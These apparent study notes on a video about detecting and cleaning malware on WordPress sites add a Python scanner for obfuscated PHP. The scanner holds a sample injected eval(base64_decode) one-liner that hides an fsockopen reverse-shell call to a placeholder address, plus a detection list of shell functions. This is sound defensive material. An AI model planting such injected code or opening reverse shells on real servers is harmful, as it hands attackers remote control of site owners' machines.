We covered automated and manual methods of scanning and cleaning a WordPress website infected with different types of malware, including redirection malware, cryptomining malware and reverse shells. We also showed how to clean an infected WordPress website using WordPress security plugins such as Wordfence.

Part 1: Identifying Infected WordPress Websites

The video explained three common scenarios of WordPress malware infections:

  • Crypto Malware: Your website might appear to function normally. However, I learned to look for significant spikes in server resource consumption, particularly CPU and RAM. This is a tell-tale sign that the malware is secretly using your server’s resources to mine cryptocurrencies.
  • Redirection Malware: This one is quite straightforward. Instead of your website loading as expected, users are abruptly redirected to a different site, often a pharmaceutical spam site (e.g., Viagra).
  • Reverse Shell: Similar to crypto malware, your site might seem to operate normally on the surface. But, behind the scenes, the malware establishes a hidden connection from your server to the attacker’s machine, giving them remote control.

Part 2: Cleaning an Infected Site

The video discussed two main approaches to cleaning an infected WordPress site:

  • Automated Methods: This involves using WordPress security plugins like Wordfence or Sucuri. You perform a full scan with these plugins to identify infected files. You can then choose to manually delete the identified files or let the plugin auto-delete them. However, a crucial caution here: auto-deleting can sometimes risk losing important design elements of your site, so having a clean backup is absolutely essential.
  • Manual Methods: This approach requires digging by hand through the WordPress root directory (typically /var/www/html). Key files and directories to inspect for malicious code include:
    • wp-config.php: Look for unusual strings or Base64-encoded content.
    • index.php: This is especially important if you’re experiencing redirection malware, as malicious redirects are often injected here.
    • wp-content/ directory: Pay close attention to the plugins/ and themes/ subdirectories for oddly named or suspicious files/folders. For example, a plugin folder named something like “391” is a major red flag.
    • .htaccess: Check this file for strange strings or calls to external domains. I also learned that malware is often obfuscated using encoding methods like Base64 to hide its true nature.

Recommended Cleaning Strategy (Prioritized)

The video below strongly recommended a prioritized strategy for cleaning:

  1. Clean Backup Method (Most Effective): If you discover an infection, the best approach is to restore your site from the most recent reliable backup. Always test the backup in a separate environment first to ensure it’s truly clean and functional before deploying it. This method minimizes data loss and ensures a completely clean slate.
  2. Automated Cleaning (Second Option): If a clean backup isn’t available or feasible, use security plugins like Wordfence or Sucuri to scan and remove infected files. Be prepared that you might lose some design elements or saved work, which you’ll need to rebuild.
  3. Manual Cleaning (Last Resort): This should be your final option as it’s very time-consuming and requires significant expertise. It’s also difficult to be 100% certain you’ve removed all traces of the malware manually.

Demonstrations and Practical Insights

The video below provided excellent demonstrations:

  • Using Wordfence for Automated Cleaning: I saw how a Wordfence scan identifies malicious files, including obfuscated strings in index.php and other files. It demonstrated how Wordfence can “repair” files by removing malicious code or “delete” malicious files entirely.
  • Manual File Inspection and Cleaning: I was walked through manually inspecting files like admin.php and options.php (noted as unusual in the root directory) and deleting them due to obfuscated content. I learned how to edit wp-config.php to remove suspicious PHP one-liners and the importance of checking the wp-content/plugins/ directory for unusually named plugin folders and inspecting their contents. The video also highlighted the value of comparing my file structure to a clean WordPress installation.
  • Identifying a Reverse Shell: Finally, the video showed an example of a reverse shell hidden within a plugin file (plugin-manager.php) in the wp-content/plugins/ directory. The malicious code was Base64 encoded. I saw how decoding the string (using a tool like CyberChef) revealed an IP address, port number, and functions like fsockopen, clearly indicating a reverse shell. The solution in this case was simply to delete the infected file.
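The manual inspection checklist and the reverse-shell demo above both boil down to the same indicators: suspicious PHP primitives, long Base64 runs that decode to more PHP, an IP address and port hidden inside the decoded text, and oddly named plugin folders. The scanner below is an added example written for this write-up, not code from the video or from Wordfence; the function names, the 40-character Base64 threshold and the TEST-NET sample payload are my own assumptions.

```python
import base64
import re

# Indicators the write-up points to: PHP primitives typical of injected one-liners and
# reverse shells, long Base64 runs, and decoded text that carries an IP address and port.
SUSPICIOUS_FUNCS = ("eval", "base64_decode", "fsockopen", "shell_exec", "passthru", "exec", "system")
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")  # 40 is an assumed threshold, not a standard
IP_PORT_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b.{0,40}?\b\d{2,5}\b")
SLUG_RE = re.compile(r"^[a-z][a-z0-9_-]*$")  # shape of an ordinary WordPress plugin folder name

def decode_blobs(text):
    """Decode each long Base64-looking run and keep only results that are readable text."""
    decoded = []
    for blob in B64_RE.findall(text):
        try:
            raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
            txt = raw.decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # a hash or random token, not an encoded payload
        if all(c.isprintable() or c in "\r\n\t" for c in txt):
            decoded.append(txt)
    return decoded

def scan_php(source):
    """Return human-readable findings for one PHP file body (empty list = nothing flagged)."""
    findings = []
    for depth, layer in enumerate([source] + decode_blobs(source)):
        where = "in decoded payload" if depth else "in plain text"
        for fn in SUSPICIOUS_FUNCS:
            if re.search(rf"\b{fn}\s*\(", layer):
                findings.append(f"{fn}() {where}")
        hit = IP_PORT_RE.search(layer)
        if depth and hit:  # an address/port pair only matters once someone has hidden it
            findings.append(f"IP and port {where}: {hit.group(0)}")
    return findings

def suspicious_plugin_dir(name):  # e.g. the folder literally named "391" from the video
    return name.isdigit() or not SLUG_RE.match(name)

# Constructed samples (not from the video): a clean wp-config fragment and the same file
# with an injected one-liner whose payload calls fsockopen() towards a TEST-NET address.
HIDDEN = base64.b64encode(b'$sock = fsockopen("203.0.113.10", 4444); /* ... */').decode()
CLEAN_CONFIG = "<?php\ndefine('DB_NAME', 'wordpress');\ndefine('DB_USER', 'wp');\n"
INJECTED_CONFIG = CLEAN_CONFIG + f"<?php eval(base64_decode('{HIDDEN}')); ?>\n"

if __name__ == "__main__":
    print("clean wp-config.php:", scan_php(CLEAN_CONFIG) or "nothing flagged")
    print("injected wp-config.php:", scan_php(INJECTED_CONFIG))
    print("plugin folder '391' suspicious:", suspicious_plugin_dir("391"))
```

Run it against real files by reading each file under the WordPress root into `scan_php`; the decoded layer is what turns a "random string" in wp-config.php or a plugin file into the readable fsockopen call the video decoded with CyberChef.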

Video Walkthrough

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, who is a cybersecurity content creator and YouTuber.
